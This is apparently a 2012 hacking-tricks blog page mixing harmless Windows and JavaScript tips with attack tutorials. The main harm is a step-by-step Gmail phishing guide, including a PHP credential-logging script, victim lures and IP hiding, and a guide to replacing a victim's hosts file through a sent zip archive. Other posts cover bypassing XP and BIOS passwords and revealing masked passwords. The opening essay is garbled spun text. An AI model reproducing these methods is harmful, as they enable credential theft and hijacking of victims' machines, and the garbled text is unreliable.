Tuesday 15 May 2012

Ethical hacker


Ethical hacker is usually an expert in hacking hired by corporate world especially using vast computer network for its operation. The idea is always to legally allow testing of the operation network with the company for virtually every existing vulnerabilities. Basically ethical hacker shows which information within the computer network may be accessed by an illegal hacker or Black Hat Hacker; how the unauthorized retrieved information may be used by an illegal hacker contrary to the interest from the company. Further the hired hacker will be able to provide tools to alert whenever successful or unsuccessful hacking bid occurs.

Company hiring hacker for that security with their automatic data processing system should explain at length which data is crucial and where it has been kept. The hired hacker himself must have integrity beyond doubt since he can be permitted to access all, sensitive in addition to non-sensitive, on the company's database. Company should make sure to thoroughly go through the profile in the hacker prior to getting him for his services.

You can find definite signs of computing system being hacked. One of the most common sign is computer running very slow. In addition to which the computer system's hard drive could possibly have software that is unrecognizable. Now now you ask , how can illegal hacker accomplish his task of hacking?

For uploading and downloading of files, FTP shortly called FTP is use for many years. Many of the commercial systems have FTP server, if this is not configured properly with firewall software for security then hacker requires little effort to hack the machine. The FTP server may be used by hacker to store illegal software and files as part of your computer's disk space. The files usually stored are pirated movies, pornography, and cracked software. The script used in programming by hackers seriously isn't an uncomplicated one. It makes a directory structure in your metabolism which stores their illegal data. The normal user finds it too tough to remove these scripts off their system since they have extended extensions very hard to identify.

In the event that users are lucky enough to get know that their system is hacked, they might eradicate hacker's script by wiping out your complete system and then again reinstalling it. Oftentimes hacker use Internet Relay Chat (IRC). In many systems hackers install IRC relay agent in order that information can be extracted from host system without understanding of owner. The sole effect which might be experienced in the computer is lowering in performance and access to the internet becoming slow.

Another option that hacker uses commonly for destructive motive is peer-to-peer file sharing software. Any ADPS which utilizes peer-to-peer file sharing software for downloading of files from internet is liable being hacked. The anti virus software placed in the machine keep a check mark on any attempt of hacking and cautions the user whenever something non-standard is detected while downloading files inside the system by making use of peer-to-peer services. Any organization allowing utilization of peer-to-peer file sharing software packages are putting their system and network at riskly.
Read More »

Hacking Windows XP Passwords





Step 1 Boot the computer into safe mode

i





Step 1Boot the computer into safe mode

i


when your starting up the computer, press F11, delete, or whatever the computers bios says to do to enter setup.



Step 2 Disable password!
once the computer is booted up in safe mode, go to -start -controlpannel -user accounts then select the administrator account, (it will say which one it is) and you should see a button to disable password, or create new password.

when thats done, shut the computer down, and use the same method to set the computer back to normal mode, and when you boot it up you will have either a new password you chose, or no password at all!!
select safemo
Read More »

Saturday 28 April 2012

How to crack or Reset BIOS Password? ~Cracking Tutorials

Bios password is usually used to protect the user's BIOS settings on the computer. If you want to reset the password on the BIOS does not need to bother to connect bateray CMOSnya, with a little trick on the Dos you can reset the BIOS password on it in 2 ways:

1. Clear CMOS
This way I consider the most ancient and most easy to break down the password on the BIOS. The steps are easy, first open the casing cover computer CPU. Then find the bios battery that looks something like the battery just a little more big clock. After the meet and consider the area around the battery there is usually a jumper with 3 pins, 2 pins and 1 pin not connected. 

Suppose the three pins with the code 1 - 2 - 3. Connector that connects the initial position usually is 2-3. To reset the bios do I move the position of the plug that connects pins 2-3 to position 1-2 for about 5 seconds. Then plug it back into the starting position (2-3). Try restarting the computer back on, secured the bios password is gone. 

If the above looks complicated, is easy to clear cmos by unplugging the BIOS battery and then put it back. But with the consequences of removing the label is the warranty on the battery BIOS.

2. Through DOS 

First out of the windows with me restart your computer, start the computer in MS-DOS mode, use the option "Command Prompt Only" 

At c: prompt, type: DEBUG 
press enter. You will see the sign (-) at the DEBUG prompt, then type: 
o 70 2e 
at the DEBUG prompt will be displayed as-o 70 2e. 
press enter and type: 
-O 71 ff 
press enter, the last type: 

hit enter, then you will get out of the DEBUG prompt and return to the C:> prompt. 
Now restart your COMPUTER, and see the results 
Read More »

How To set up Your own server

How To set up Your own server?
  Download the  Webserver softwares like WAMP,XAMP(Both are open source software, I meant they are free ).  My suggestion is WAMP.  Because it is my favorite one.  It is easy to use.

Downlad the wamp server from http://www.wampserver.com/

Install the WAMP server.  After installation completed, Go to this folder path:
C:\Wamp\WWW
And paste your phishing web page here.

Start the Wamp Server.
(Start->windows->All Programs->Wamp Server->start wamp server)

you can see the half circle icon(wamp server icon) in system tray(i mean near to the time). Click the icon and select the start all services.

Now type your ip address in address bar of the web browser and hit enter. If you don't know your ip address ,visit www.whatismyip.com.

Now you can see your Phishing web page in your Browser.

Modifying the Host file :
 Copy the Host file from this path "C:\WINDOWS\system32\drivers\etc" to desktop.  Right click on the host file and open with Notepad.

You can see the localhost entry there.
Below that type as :
your_ip     domain_name
For eg:
123.xx.xx.xx www.gmail.com
.
 Save the File.

Compress the Host File:

    Compress hosts file such that when victim opens it, it automatically gets copied to default 
location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.
  
Right click on the Hosts file and select the Add to archieve option.  Now follow the steps which is shown in picture:







Now send the zipped file to victim.  If he extract the zip file, then the hosts file will be replaced.
You are done.  Now whenever he try to visit the genuine or original website, the phishing webpage only will be shown.
Read More »

How to create fake or Phishing web page for gmail


Steps for Creating Phishing or Fake web Page:

Step 1:
Go to the gmail.com.  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

Step3:
 Upload those image to tinypic or photobucker.com.  copy the url of each image.

Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5: 
Search for the

 action="https://www.google.com/accounts/ServiceLoginAuth"

Replace it with 

action="http://yoursite urlhere/login.php"

 save the file.
Step6: 
Now you need to create login.php
 so you need to open the notepad and type as
<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 8: 
create an email with gmail keyword.
 like : gmailburger@gmail.com

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.



 Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.
Read More »

Wednesday 25 January 2012

How to see password behind asterisks ?


Using a java script we can easily get the password behind asterisks on any web page.To get the password behind asterisks follow below steps :

  • Go to the page containing password in asterisks.
  • Now copy the following code
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
  • Paste the code into address bar of the page.
  • You will get the password on the page.
Read More »

How to convert iphone to wifi router ?

NOTE : To turn your iphone to a wifi router or wifi hotspot first your iphone should be jailbroken.


  • First go to cydia on your iphone and search for the application my wi and install it.
  • Now go to mywi from your spring board and turn on wifi tethering.
  • To set password turn on WEP Security and set your password.
  • Now your cellular internet is sharable with your friends or any of your device having wifi.
Read More »

Run Commands

  • Accessibility Options : access.cpl
  • Add Hardware : hdwwiz.cpl
  • Add / Remove Programs : appwiz.cpl
  • Administrative Tools : control admintools
  • Automatic Updates : wuaucpl.cpl
  • Wizard file transfer Bluethooth : fsquirt
  • Calculator : calc
  • Certificate Manager : certmgr.msc
  • Character : charmap
  • Checking disk : chkdsk
  • Manager of the album (clipboard) : clipbrd
  • Command Prompt : cmd
  • Service components (DCOM) : dcomcnfg
  • Computer Management : compmgmt.msc
  • DDE active sharing : ddeshare
  • Device Manager : devmgmt.msc
  • DirectX Control Panel (if installed) : directx.cpl
  • DirectX Diagnostic Utility : dxdiag
  • Disk Cleanup : cleanmgr
  • System Information : dxdiag
  • Disk Defragmenter : dfrg.msc
  • Disk Management : diskmgmt.msc
  • Partition manager : diskpart
  • Display Properties : control desktop
  • Properties of the display (2) : desk.cpl
  • Properties display (tab "appearance") : control color
  • Dr. Watson : drwtsn32
  • Manager vérirficateur drivers : check
  • Event Viewer : Eventvwr.msc
  • Verification of signatures of files : sigverif
  • Findfast (if present) : findfast.cpl
  • Folder Options : control folders
  • Fonts (fonts) : control fonts
  • Fonts folder windows : fonts
  • Free Cell : freecell
  • Game Controllers : Joy.cpl
  • Group Policy (XP Pro) : gpedit.msc
  • Hearts (card game) : mshearts
  • IExpress (file generator. Cab) : IExpress
  • Indexing Service (if not disabled) : ciadv.msc
  • Internet Properties : inetcpl.cpl
  • IPConfig (display configuration) : ipconfig / all
  • IPConfig (displays the contents of the DNS cache) : ipconfig / displaydns
  • IPConfig (erases the contents of the DNS cache) : ipconfig / flushdns
  • IPConfig (IP configuration cancels maps) : ipconfig / release
  • IPConfig (renew IP configuration maps) : ipconfig / renew
  • Java Control Panel (if present) : jpicpl32.cpl
  • Java Control Panel (if present) : javaws
  • Keyboard Properties : control keyboard
  • Local Security Settings : secpol.msc
  • Local Users and Groups : lusrmgr.msc
  • Logout : logoff
  • Microsoft Chat : winchat
  • Minesweeper (game) : winmine
  • Properties of the mouse : control mouse
  • Properties of the mouse (2) : main.cpl
  • Network Connections : control NetConnect
  • Network Connections (2) : ncpa.cpl
  • Network configuration wizard : netsetup.cpl
  • Notepad : notepad
  • NView Desktop Manager (if installed) : nvtuicpl.cpl
  • Manager links : packager
  • Data Source Administrator ODBC : odbccp32.cpl
  • Screen Keyboard : OSK
  • AC3 Filter (if installed) : ac3filter.cpl
  • Password manager (if present) : Password.cpl
  • Monitor performance : perfmon.msc
  • Monitor performance (2) : perfmon
  • Dialing Properties (phone) : telephon.cpl
  • Power Options : powercfg.cpl
  • Printers and Faxes : control printers
  • Private Character Editor : eudcedit
  • Quicktime (if installed) : QuickTime.cpl
  • Regional and Language Options : intl.cpl
  • Editor of the registry : regedit
  • Remote desktop connection : mstsc
  • Removable Storage : ntmsmgr.msc
  • requests the operator to removable storage : ntmsoprq.msc
  • RSoP (traduction. ..) (XP Pro) : rsop.msc
  • Scanners and Cameras : sticpl.cpl
  • Scheduled Tasks : control schedtasks
  • Security Center : wscui.cpl
  • Console management services : services.msc
  • shared folders : fsmgmt.msc
  • Turn off windows : shutdown
  • Sounds and Audio Devices : mmsys.cpl
  • Spider (card game) : spider
  • Client Network Utility SQL server : cliconfg
  • System Configuration Editor : sysedit
  • System Configuration Utility : msconfig
  • System File Checker (SFC =) (Scan Now) : sfc / scannow
  • SFC (Scan next startup) : sfc / scanonce
  • SFC (Scan each démarraget) : sfc / scanboot
  • SFC (back to default settings) : sfc / revert
  • SFC (purge cache files) : sfc / purgecache
  • SFC (define size CAHC x) : sfc / cachesize = x
  • System Properties : sysdm.cpl
  • Task Manager : taskmgr
  • Telnet client : telnet
  • User Accounts : nusrmgr.cpl
  • Utility Manager (Magnifier, etc) : utilman
  • Windows firewall (XP SP2) : firewall.cpl
  • Microsoft Magnifier : magnify
  • Windows Management Infrastructure : wmimgmt.msc
  • Protection of the accounts database : syskey
  • Windows update : wupdmgr
  • Introducing Windows XP (if not erased) : tourstart
  • Wordpad : write
  • Date and Time Properties : timedate.cpl
Read More »

Notepad Tricks


1. World Trade Center Attack Trick

As you might be knowing that the flight number of the plane that had hit World Trade Center on that dreadful day (9/11) was Q33NY. Now call this trick a coincidence or something else but whatever it is, it does startle us.

    Open Notepad.
    Type “Q33N” (without quotes) in capital letters.
    Increase the font size to 72.
    Change the Font to Wingdings.


You will be amazed by the findings.

2.Make A Personal Log-Book or A Diary

Did you know that you can also use Notepad as a simple digital diary or a personal Log-Book ? Well, if you didn’t then follow the below mentioned steps to make one for yourself !

    Open Notepad.
    Type .LOG (in capital letters) and hit enter.
    Save it with any name and close it.
    Open it again.


When you open the file again you will see the current date and time being inserted automatically after the .LOG line. This will happen automatically every time you reopen the the notepad file.

3.Matrix Effect

Not much to explain, just follow the steps and see the amazing matrix effect happen in your DOS window:

    Open Notepad.
    Copy the below mentioned text in your notepad file:



@echo off

color 02

:start

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start

    Save the file with .bat extension like Matrix.bat


Thats it. Just open the file to see the matrix effect !

4.Test your anti virus

Using simple notepad trick you can check your anti virus whether its working properly or not.

    Open Notepad.
    Copy the below code in the notepad file:
    X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
    Save it with an .exe extension like testvirus.exe

As soon as you will save this notepad file your anti virus will detect it as a virus.If it detect the file as virus your  anti virus is working properly if not than you need to change your programe.
Read More »

How to make computer speak whatever you type ?

 
To make your computer speaks whatever you write just follow the steps below.There is no requirement of any software it is just a simple trick.
  • Open Notepad and copy the following code.

     Dim message, sapi
      message=InputBox("What do you want me to say?","COOL IPHONE AND HACKING TRICKS")
     Set sapi=CreateObject("sapi.spvoice")
     sapi.Speak message
  • Save the file as speak.vbs
  • Now, close the notepad and open it again and you are done.
Read More »

javascript tricks

CALCULATOR : Using this javascript you can use your web browser as an calculator. Just replace  the below value for what ever mathematical calculation you want.    

          javascript: alert(4+5+6+7+(3*10));


EDIT ANY WEBPAGE : Using this javascript you can edit any webpage. The changes are not permanent as soon as you will refresh the page the changes will be lost.

        javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0


IMAGES FLY OVER WEB PAGE : For this javascript to work there must be some pictures in the website. I will prefer you to try this javascript on facebool as it will show cool effect.

javascript: R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

Read More »